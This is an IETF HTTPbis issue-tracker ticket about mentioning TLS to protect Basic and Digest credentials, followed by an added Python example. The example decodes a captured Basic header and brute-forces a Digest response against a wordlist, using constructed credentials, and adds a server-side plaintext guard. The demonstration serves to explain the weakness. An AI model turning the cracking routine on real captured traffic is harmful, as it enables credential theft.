Opened 6 years ago

Closed 5 years ago

Last modified 5 years ago

#539 closed editorial (incorporated)

mention TLS vs plain text passwords or dict attacks?

Reported by: julian.reschke@… Owned by: draft-ietf-httpbis-p7-auth@…
Priority: normal Milestone: 26
Component: p7-auth Severity: In IESG Evaluation
Keywords: Cc:

Description

Sean Turner

1) So I guess the reason we're not saying TLS is an MTI with basic/digest is that that's getting done in an httpauth draft? It really wouldn't hurt to duplicate that while we're getting the other one done (I know you *don't* want a reference to that draft).


Stephen Farrell

Please check the secdir review (http://www.ietf.org/mail-archive/web/secdir/current/msg03491.html). I agree with the comment that this really should have some mention of using TLS to protect basic/digest, even if that ought also be elsewhere.

Attachments (1)

539.diff (1.7 KB) - added by julian.reschke@… 6 years ago.
Proposed change


Change History (7)

comment:1 Changed 6 years ago by julian.reschke@…

P7 currently does not attempt to discuss security considerations that would be specific to particular authentication schemes.

Basic and Digest are defined in RFC 2617, and already have these warnings in their Security Considerations. The same will be true for the replacement specs the HTTPAUTH WG is working on.

Thus I'd like to close this as WONTFIX.

comment:2 follow-up: Changed 6 years ago by fielding@…

It would make sense to have a general mention of using a secured connection (e.g., TLS) when using any form of authentication, regardless of auth-scheme. However, it would be incorrect to say that it is mandatory to implement; such requirements do not apply to HTTP/1.1.

comment:3 in reply to: ↑ 2 Changed 6 years ago by julian.reschke@…

Replying to fielding@…:

It would make sense to have a general mention of using a secured connection (e.g., TLS) when using any form of authentication, regardless of auth-scheme. However, it would be incorrect to say that it is mandatory to implement; such requirements do not apply to HTTP/1.1.

In the Introduction, I assume. Care to propose concrete text?

Last edited 6 years ago by julian.reschke@…

Changed 6 years ago by julian.reschke@…

Proposed change

comment:4 Changed 5 years ago by julian.reschke@…

From [2571]:

mention that the auth related header fields by default are sent unsecured and hint at TLS (see #539)

comment:5 Changed 5 years ago by julian.reschke@…

  • Resolution set to incorporated
  • Status changed from new to closed

comment:6 Changed 5 years ago by fielding@…

From [2573]:

(editorial) move and expand on discussion of confidentiality of credentials in its own security considerations section; see #539
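The point the ticket settled on, that Authorization header fields travel unprotected unless the connection itself is secured, is easy to see with a concrete capture. The block below is an added example written for this page; it is not code from the ticket, from RFC 2617 or from the HTTPbis drafts. It takes two constructed Authorization header values as an on-path observer would read them off a plaintext connection: a Basic one, which is only base64-encoded and decodes directly to the password, and a Digest one with qop=auth, whose username is visible in the clear and whose response hash can be replayed offline against a wordlist (the "dict attacks" in the ticket title). The username alice, password hunter2, realm, nonce values and wordlist are all constructed for the example; the Digest response is computed with the same RFC 2617 formula the attacker reimplements. The last function is an assumed server-side guard, not something any draft specifies: refuse to consume Basic or Digest credentials at all when the connection is not TLS.

```python
import base64
import binascii
import hashlib
import re


def parse_authorization(header_value: str):
    """Split an Authorization field value into (lowercased scheme, remainder)."""
    scheme, _, rest = header_value.strip().partition(" ")
    return scheme.lower(), rest.strip()


# --- Basic: the "secret" is only base64-encoded -----------------------------

def recover_basic(header_value: str):
    """Return (user, password) from 'Basic <token>', or None if not Basic."""
    scheme, token = parse_authorization(header_value)
    if scheme != "basic":
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except binascii.Error:
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None


# --- Digest: username in the clear, response hash crackable offline ---------

def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(user, realm, password, method, uri, nonce, nc, cnonce, qop):
    """RFC 2617 request-digest for qop=auth: MD5(HA1:nonce:nc:cnonce:qop:HA2)."""
    ha1 = _md5(f"{user}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


# name=value pairs, quoted or unquoted, as they appear in a Digest header
_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]+))')


def parse_digest_params(rest: str) -> dict:
    return {k: (q or u) for k, q, u in _PARAM.findall(rest)}


def dictionary_attack(header_value: str, method: str, wordlist):
    """Offline guess of the password behind a captured Digest response."""
    scheme, rest = parse_authorization(header_value)
    if scheme != "digest":
        return None
    p = parse_digest_params(rest)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate, method,
                                p["uri"], p["nonce"], p["nc"], p["cnonce"], p["qop"])
        if guess == p["response"]:
            return p["username"], candidate
    return None


# --- Assumed server-side guard (not from any draft) -------------------------

def server_should_process(header_value: str, connection_is_tls: bool) -> bool:
    """Do not even read Basic/Digest credentials sent over a plaintext connection."""
    scheme, _ = parse_authorization(header_value)
    if scheme in ("basic", "digest") and not connection_is_tls:
        return False
    return True


# Constructed samples: header values as seen by an on-path observer.
CAPTURED_BASIC = "Basic YWxpY2U6aHVudGVyMg=="  # base64("alice:hunter2")

_NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"  # constructed server nonce from the 401
_CNONCE = "0a4f113b"                           # constructed client nonce
CAPTURED_DIGEST = (
    'Digest username="alice", realm="example.com", nonce="%s", uri="/admin", '
    'qop=auth, nc=00000001, cnonce="%s", response="%s"'
    % (_NONCE, _CNONCE,
       digest_response("alice", "example.com", "hunter2", "GET", "/admin",
                       _NONCE, "00000001", _CNONCE, "auth"))
)
WORDLIST = ["password", "123456", "letmein", "hunter2", "qwerty"]

if __name__ == "__main__":
    print("Basic  ->", recover_basic(CAPTURED_BASIC))
    print("Digest ->", dictionary_attack(CAPTURED_DIGEST, "GET", WORDLIST))
    print("accept on plaintext?", server_should_process(CAPTURED_BASIC, False))
```

Neither scheme's weakness is fixed by the other: Basic leaks the password outright, Digest leaks the username and a hash that costs one MD5 chain per guess to test. Running either over TLS is what keeps the header value away from the observer in the first place, which is the hint the resolved text adds.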
